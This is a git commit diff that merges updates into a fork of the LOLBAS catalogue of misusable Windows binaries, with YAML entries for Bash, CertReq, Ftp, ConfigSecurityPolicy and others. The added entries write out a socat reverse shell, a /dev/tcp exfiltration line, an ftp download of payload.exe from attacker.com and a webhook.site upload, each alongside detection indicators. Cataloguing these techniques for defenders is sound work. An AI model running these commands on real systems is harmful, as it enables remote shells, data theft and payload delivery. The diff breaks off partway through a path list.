Merge pull request #1 from LOLBAS-Project/master

Updating repository
2024-12-26 14:59:03 +01:00 · 2020-10-29 09:01:46 +01:00 · 2020-10-29 09:01:46 +01:00 · 6e5bd0e9e1
commit 6e5bd0e9e1
parent 94a295213e d15172284a
39 changed files with 1072 additions and 142 deletions
--- a/yml/OSBinaries/Atbroker.yml
+++ b/yml/OSBinaries/Atbroker.yml
@ -19,7 +19,7 @@ Code_Sample:
 - Code:
 Detection:
 - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
- - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
+ - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
 - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
 Resources:
  - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
@ -12,6 +12,22 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows 10
+  - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
+    Description: Executes a reverseshell
+    Usecase: Performs execution of specified file, can be used as a defensive evasion.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 10
+  - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
+    Description: Exfiltrate data
+    Usecase: Performs execution of specified file, can be used as a defensive evasion.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 10
  - Command: bash.exe -c calc.exe
    Description: Executes calc.exe from bash.exe
    Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
@ -32,4 +48,6 @@ Resources:
 Acknowledgement:
  - Person: Alex Ionescu
    Handle: '@aionescu'
+  - Person: Asif Matadar
+    Handle: '@d1r4c'
 ---
--- a/yml/OSBinaries/Certreq.yml
+++ b/yml/OSBinaries/Certreq.yml
@ -0,0 +1,36 @@
+---
+Name: CertReq.exe
+Description: Used for requesting and managing certificates
+Author: 'David Middlehurst'
+Created: '2020-07-07'
+Commands:
+  - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
+    Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
+    Usecase: Download file from Internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
+    Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
+    Usecase: Upload
+    Category: Upload
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+  - Path: C:\Windows\System32\certreq.exe
+  - Path: C:\Windows\SysWOW64\certreq.exe
+Code_Sample: 
+  - Code:
+Detection:
+  - IOC: certreq creates new files
+  - IOC: certreq makes POST requests
+Resources:
+  - Link: https://dtm.uk/certreq
+Acknowledgement:
+  - Person: David Middlehurst
+    Handle: '@dtmsecurity'
+---
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@ -25,8 +25,8 @@ Commands:
    Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
    Category: ADS
    Privileges: User
-    MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/techniques/T1096
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: certutil -encode inputFileName encodedOutputFileName
    Description: Command to encode a file using Base64
@ -44,6 +44,14 @@ Commands:
    MitreID: T1140
    MitreLink: https://attack.mitre.org/wiki/Technique/T1140
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: certutil --decodehex encoded_hexadecimal_InputFileName 
+    Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
+    Usecase: Decode files to evade defensive measures
+    Category: Decode
+    Privileges: User
+    MitreID: T1140
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1140
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\certutil.exe
  - Path: C:\Windows\SysWOW64\certutil.exe
@ -64,4 +72,5 @@ Acknowledgement:
    Handle: '@Moriarty_Meng'
  - Person: egre55
    Handle: '@egre55'
+  - Person: Lior Adar
 ---
--- a/yml/OSBinaries/ConfigSecurityPolicy.yml
+++ b/yml/OSBinaries/ConfigSecurityPolicy.yml
@ -0,0 +1,32 @@
+---
+Name: ConfigSecurityPolicy.exe
+Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
+Author: 'Ialle Teixeira'
+Created: '04/09/2020'
+Commands:
+  - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
+    Description: Upload file, credentials or data exfiltration in general
+    Usecase: Upload file
+    Category: Upload
+    Privileges: User
+    MitreID: T1567
+    MitreLink: https://attack.mitre.org/techniques/T1567/
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
+Code_Sample: 
+  - Code: 
+Detection: 
+  - IOC: ConfigSecurityPolicy storing data into alternate data streams.
+  - IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
+  - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
+  - IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
+Resources:
+  - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads
+  - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads
+  - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor
+  - Link: https://twitter.com/NtSetDefault/status/1302589153570365440?s=20
+Acknowledgement:
+  - Person: Ialle Teixeira
+    Handle: '@NtSetDefault'
+---
--- a/yml/OSBinaries/Desktopimgdownldr.yml
+++ b/yml/OSBinaries/Desktopimgdownldr.yml
@ -0,0 +1,27 @@
+---
+Name: Desktopimgdownldr.exe
+Description: Windows binary used to configure lockscreen/desktop image
+Author: Gal Kristal
+Created: 28/06/2020
+Commands:
+  - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
+    Description: Downloads the file and sets it as the computer's lockscreen
+    Usecase: Download arbitrary files from a web server
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/techniques/T1105/
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: c:\windows\system32\desktopimgdownldr.exe
+Code_Sample: 
+  - Code: 
+Detection: 
+  - IOC: desktopimgdownldr.exe that creates non-image file
+  - IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
+Resources:
+  - Link: https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
+Acknowledgement:
+  - Person: Gal Kristal
+    Handle: '@gal_kristal'
+---
--- a/yml/OSBinaries/Diantz.yml
+++ b/yml/OSBinaries/Diantz.yml
@ -0,0 +1,38 @@
+---
+Name: Diantz.exe
+Description: Binary that package existing files into a cabinet (.cab) file
+Author: 'Tamir Yehuda'
+Created: '08/08/2020'
+Commands:
+  - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
+    Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
+    Usecase: Hide data compressed into an Alternate Data Stream. 
+    Category: ADS
+    Privileges: User
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
+  - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
+    Description: Download and compress a remote file and store it in a cab file on local machine.
+    Usecase: Download and compress into a cab file. 
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
+Full_Path:
+  - Path: c:\windows\system32\diantz.exe
+  - Path: c:\windows\syswow64\diantz.exe
+Code_Sample: 
+  - Code: 
+Detection: 
+  - IOC: diantz storing data into alternate data streams.
+  - IOC: diantz getting a file from a remote machine or the internet.
+Resources:
+  - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz
+Acknowledgement:
+  - Person: Tamir Yehuda
+    Handle: '@tim8288'
+  - Person: Hai Vaknin
+    Handle: '@vakninhai'
+---
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@ -0,0 +1,39 @@
+---
+Name: Explorer.exe
+Description: Binary used for managing files and system components within Windows
+Author: 'Jai Minton'
+Created: '2020-06-24'
+Commands:
+  - Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
+    Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
+    Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: explorer.exe C:\Windows\System32\notepad.exe
+    Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
+    Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 10 (Tested)
+Full_Path:
+  - Path: C:\Windows\explorer.exe
+  - Path: C:\Windows\SysWOW64\explorer.exe
+Code_Sample: 
+- Code:
+Detection:
+ - IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
+Resources:
+  - Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20
+  - Link: https://twitter.com/bohops/status/1276356245541335048
+  - Link: https://twitter.com/bohops/status/986984122563391488
+Acknowledgement:
+  - Person: Jai Minton
+    Handle: '@CyberRaiju'
+  - Person: Jimmy
+    Handle: '@bohops'
+---
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@ -28,6 +28,14 @@ Commands:
    MitreID: T1105
    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
+    Description: Command for copying calc.exe to another folder
+    Usecase: Copy file
+    Category: Copy
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\extrac32.exe
  - Path: C:\Windows\SysWOW64\extrac32.exe
@ -44,4 +52,8 @@ Acknowledgement:
    Handle: '@egre55'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
+  - Person: Hai Vaknin(Lux
+    Handle: '@VakninHai'
+  - Person: Tamir Yehuda
+    Handle: '@tim8288'
 ---
--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@ -12,6 +12,14 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
+    Description: Download
+    Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\ftp.exe
  - Path: C:\Windows\SysWOW64\ftp.exe
@ -23,6 +31,7 @@ Resources:
  - Link: https://twitter.com/0xAmit/status/1070063130636640256
  - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939
  - Link: https://ss64.com/nt/ftp.html
+  - Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
--- a/yml/OSBinaries/GfxDownloadWrapper.yml
+++ b/yml/OSBinaries/GfxDownloadWrapper.yml
@ -0,0 +1,179 @@
+---
+Name: GfxDownloadWrapper.exe
+Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
+Author: Jesus Galvez
+Created: Jesus Galvez
+Commands:
+  - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
+    Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
+    Usecase: Download file from internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/techniques/T1105/
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\
+  - Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\
+  - Path: c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\
+  - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\
+  - Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\
+  - Path: c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\
+  - Path: c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\
+  - Path: c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\
+  - Path: c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\
+  - Path: c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\
+  - Path: c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\
+  - Path: c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\
+  - Path: c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\
+  - Path: c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\
+  - Path: c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\
+  - Path: c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\
+  - Path: c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\
+  - Path: c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\
+  - Path: c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\
+  - Path: c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\
+  - Path: c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\
+  - Path: c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\
+  - Path: c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\
+  - Path: c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\
+  - Path: c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\
+  - Path: c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\
+  - Path: c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\
+  - Path: c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\
+  - Path: c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\
+  - Path: c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\
+  - Path: c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\
+  - Path: c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\
+  - Path: c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\
+  - Path: c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\
+  - Path: c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\
+  - Path: c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\
+  - Path: c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\
+  - Path: c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\
+  - Path: c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\
